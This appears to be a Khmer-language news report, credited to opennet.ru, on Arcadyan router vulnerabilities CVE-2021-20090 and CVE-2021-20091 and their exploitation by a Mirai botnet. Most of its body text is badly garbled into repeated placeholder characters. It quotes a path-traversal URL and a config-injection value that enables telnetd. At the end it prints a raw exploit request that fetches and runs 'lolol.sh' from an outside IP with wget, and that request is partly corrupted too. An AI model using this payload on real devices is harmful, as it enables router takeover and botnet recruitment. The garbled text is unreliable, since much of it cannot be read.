ααΆαααΆααααα αΆααααααα½αααααΌαααΆααααααααΆαα ααΎαααααΆααααααΆααααΉααααααααααααααααααααα·ααΈααααααααααΎααααΆααααΆαααααα·ααααα·αααΆαααΈααα HTTP ααΈαααα»αα αα»α Arcadyan α ααΎααααΈααα½αααΆαααΆααααααααααααΎα§ααααα ααΆααα½ααααα αΌαααααΆααααΆαααΆααααααααααΈαααααΌαααΆαααααΎαααα’αα»ααααΆαα±ααααααα·ααααα·ααΈα ααααΆαααααΌαααααΆαααΆαα½αααΉααα·αααα·ααΆ root α αααα αΆααααααααΆαααααααααααα ADSL ααΆα αααΎαααΈ Arcadyan, ASUS αα·α Buffalo ααααΌα ααΆα§ααααααααααααααααααααααααααΆα Beeline (αααα αΆααααΌαααΆααααααΆαααα αααα»α Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone αα·α ααααα·ααααα·ααααΌαααααΆααααααααααααα ααΆααααΌαααΆαααααααααΆααααΆαααα αΆααΆαααααααΆααα αααα»ααααααα·ααΈαααααα Arcadyan α’ααααααααααΆα 10 ααααΆαααα αΎαα αΎααααα»αα’αα‘α»αααααααααΆααααΆααααααααααααΎααααΈααααΆααααααΌααα αααΆαα αα ααΆαα 20 αααΌαααα§αααααααΈαααα»αα αα»αααα·α 17 αααααααααΆα
ααΆαααΆααααααααααΈαα½α CVE-2021-20090 ααααΎα±ααααΆα’αΆα α αΌαααααΎααααααΈαα ααα»α αααααΆααααα αααααααΆαα½αααααα·αα αΆαααΆα αααΆαααΆααααααααααΆααα ααααΉαααΆαααααΆαααΆααααααααααΊααΆαα αααα»αα ααα»α αααααΆαααααααΆα αααα½αα ααα½ααααααΌαααΆα α―αααΆα CSS αα·αααααααΈα JavaScript ααααΌαααΆαααααΎααΊα’αΆα α αΌαααααΎααΆαααααα·αα αΆαααΆα αααΆαααΆααααααααααΆααα αααα»αααααΈααα αααααααΆαα αΌαααααΎαααααααΆαααΆααααααααααΆααααααΌαααΆαα’αα»ααααΆαααααΌαααΆααα·αα·ααααααααααΎαααΆααααααΌαα ααΆααααααΆαααα½α’αααα β../β αα αααα»αααααΌαααΎααααΈαα ααΆααααααααααΌαααΆαααΆααΆααααααααααα·ααΈαααααα ααα»ααααααΆαααααΎααααα β..%2fβ ααααΌαααΆαααααα ααΌα αααα ααΆα’αΆα αα αα½α αααα»αααΆαααΎαααααααααααΆαααΆαααΆααα αααααααΎααααΎααΌα ααΆ βhttp://192.168.1.1/images/..%2findex.htmβα
ααΆαααΆααααααααααΈααΈα CVE-2021-20091 α’αα»ααααΆαα±ααα’αααααααΎααααΆααααααααααααααΆααααΆαααααΉαααααΌαααααΎααΆαααααΆααααααΌαααΆααααααααααααααααααα§ααααααααααααΎαααΆαααΆαααααααααααΆαααααΎαααααααααΆααα·ααααα ααΆααααααααΈα apply_abstract.cgi ααααα·ααα·αα·αααααΎαααααααΆααααα½α’αααααααααΆααααααΈαα αααα»ααααΆαααΆαααααα . α§ααΆα ααα αα αααα’αα»ααααααααα·ααααα·ααΆα ping α’αααααΆααααα αΆαα’αΆα αααααΆααααααα β192.168.1.2%0AARC_SYS_TelnetdEnable=1β αα αααα»αααΆααααααΆαα’αΆααααααΆα IP αααα»αααααΌαααΆααα·αα·ααα αα·αααααααΈα αα ααααααααΎαα―αααΆαααΆαααααα /tmp/etc/config/ .glbcfg ααΉαααααααααααΆαα βAARC_SYS_TelnetdEnable=1β αα αααα»αααΆβ αααααααΎα²αααααΆαααΈααα telnetd ααααα ααααααααααΌαααΆαα αΌαααααΎαααααΆααααααααΆααααα·αααΆαααΆαααΉααααααΉαααΆαα½αααΉααα·αααα·ααΆ root α ααΌα ααααΆαααααα αααααααααααΆαααΆαααααα AARC_SYS α’αααα’αΆα ααααα·ααααα·ααΌαααΆαα½ααα ααΎααααααααα ααΆαααΆααααααααααααΌαααααΎα±ααααΆα’αΆα ααααΎαααΆαααααααΈααααααΆααααα αΆαααααααΆαααΆααααααααααΆαααααα αΌααα ααΆααααΆααΆ β/images/..%2fapply_abstract.cgiβα
ααΎααααΈααΆαααααΆαααΆαααααααα α’αααααΆααααα αΆαααααΌαααα’αΆα
ααααΎααααΎαα
ααΆααα
ααααααααΆααααα
ααα»α
αααααΆαααααααΆααααα»αααααΎαααΆαα ααααα·αα·α
ααααααααααααΆαα»ααααααΆαααΈαααΆαααΆαααααΆαααΆααααα αΆα ααααα·ααααα·ααααΆα
αααΎαα
αΆαα
ααααΈααΆαα
αΌαααααΎα§ααααααααααα½αααααΈαααααΆαααΆααααα
ααΎααααΈααααα½αααΆααα·αα·α
αααααααα αΆαααααααΆααααααΆααααα ααααα·αααΎααΆαα
αΌααα
ααΆααα
ααα»α
αααααΆααααααΌαααΆαααααααααααΆαααααααααΆαααΆααααα»α ααΆαααΆααααα αΆαα’αΆα
ααααΌαααΆαα’αα»ααααααΈαααααΆαααΆααααα
αααααααΎαα
αα
ααααα "ααΆαααααΆαα DNS" α ααΆαααΆααααααααααααΌαααΆαααααΎααααΆαααααΆααααααααΎααααΈααααΆααααααααααα
ααΆαα Mirai botnetα POST /images/..%2fapply_abstract.cgi HTTP/1.1 ααΆααααααΆααα αα·α User-Agentα Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7.ipad 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
ααααα: opennet.ru